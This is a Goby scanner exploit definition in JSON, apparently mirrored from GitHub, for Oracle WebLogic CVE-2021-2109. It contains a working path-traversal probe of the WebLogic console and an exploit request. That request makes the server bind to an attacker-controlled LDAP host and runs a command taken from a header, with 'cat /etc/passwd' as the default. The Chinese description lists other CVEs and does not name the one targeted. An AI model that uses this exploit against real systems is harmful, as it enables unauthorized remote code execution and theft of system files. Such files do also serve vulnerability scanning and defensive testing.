mirror of https://github.com/qwqdanchun/Goby.git
87 lines
3.4 KiB
JSON
87 lines
3.4 KiB
JSON
{
|
||
"Name": "Weblogic_LDAP RCE_CVE-2021-2109",
|
||
"Level": "3",
|
||
"Tags": [
|
||
"RCE"
|
||
],
|
||
"GobyQuery": "app=\"Oracle-WeblogicPortal\"",
|
||
"Description": "2021年1月20日,绿盟科技监测发现Oracle官方发布了2021年1月关键补丁更新公告CPU(Critical Patch Update),共修复了329个不同程度的漏洞,其中包括7个影响WebLogic的严重漏洞(CVE-2021-1994、CVE-2021-2047、CVE-2021-2064、CVE-2021-2108、CVE-2021-2075、CVE-2019-17195、CVE-2020-14756),未经身份验证的攻击者可通过此次的漏洞实现远程代码执行。CVSS评分均为9.8,利用复杂度低。建议用户尽快采取措施,对上述漏洞进行防护。\n\nWebLogic Server 10.3.6.0.0\nWebLogic Server 12.1.3.0.0\nWebLogic Server 12.2.1.3.0\nWebLogic Server 12.2.1.4.0\nWebLogic Server 14.1.1.0.0",
|
||
"Product": "WebLogicd",
|
||
"Homepage": "https://www.oracle.com/middleware/technologies/weblogic.html",
|
||
"Author": "PeiQi",
|
||
"Impact": "<p><span style=\"color: rgb(65, 140, 175);\">咩咩咩🐑</span></p>",
|
||
"Recommandation": "",
|
||
"References": [
|
||
"http://wiki.peiqi.tech"
|
||
],
|
||
"HasExp": true,
|
||
"ExpParams": [
|
||
{
|
||
"name": "Cmd",
|
||
"type": "input",
|
||
"value": "cat /etc/passwd",
|
||
"show": ""
|
||
},
|
||
{
|
||
"name": "Ldap",
|
||
"type": "input",
|
||
"value": "ldap://xxx.xxx.xxx;xxx:1389",
|
||
"show": ""
|
||
}
|
||
|
||
],
|
||
"ScanSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?",
|
||
"follow_redirect": true,
|
||
"header": {},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"ResponseTest": {
|
||
"type": "group",
|
||
"operation": "AND",
|
||
"checks": [
|
||
{
|
||
"type": "item",
|
||
"variable": "$code",
|
||
"operation": "==",
|
||
"value": "200",
|
||
"bz": ""
|
||
},
|
||
{
|
||
"type": "item",
|
||
"variable": "$body",
|
||
"operation": "contains",
|
||
"value": "JNDI",
|
||
"bz": ""
|
||
}
|
||
]
|
||
},
|
||
"SetVariable": []
|
||
}
|
||
],
|
||
"ExploitSteps": [
|
||
"AND",
|
||
{
|
||
"Request": {
|
||
"method": "GET",
|
||
"uri": "/console/css/%252e%252e%252f/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22{{{Ldap}}}/Basic/WeblogicEcho;AdminServer%22)",
|
||
"follow_redirect": true,
|
||
"header": {
|
||
"cmd": "{{{Cmd}}}"
|
||
},
|
||
"data_type": "text",
|
||
"data": ""
|
||
},
|
||
"SetVariable": [
|
||
"output|lastbody"
|
||
]
|
||
}
|
||
],
|
||
"PostTime": "2021-01-22 13:55:45",
|
||
"GobyVersion": "1.8.230"
|
||
} |